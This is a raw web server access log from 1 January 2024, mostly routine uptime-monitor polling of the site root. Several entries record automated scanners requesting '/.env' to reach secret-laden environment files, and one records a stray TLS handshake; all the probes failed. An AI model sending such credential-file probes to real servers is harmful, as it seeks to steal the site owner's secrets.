212.91.246.72 - - [01/Jan/2024:07:21:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.219 - - [01/Jan/2024:07:21:29 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.219 - - [01/Jan/2024:07:21:29 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
185.224.128.191 - - [01/Jan/2024:07:21:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Jan/2024:07:22:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:23:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.191 - - [01/Jan/2024:07:23:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jan/2024:07:24:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:25:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
207.148.75.246 - - [01/Jan/2024:07:25:45 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
207.148.75.246 - - [01/Jan/2024:07:25:53 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
185.224.128.191 - - [01/Jan/2024:07:26:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jan/2024:07:26:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:27:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:28:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:29:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:30:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:31:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:32:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:33:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.191 - - [01/Jan/2024:07:33:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
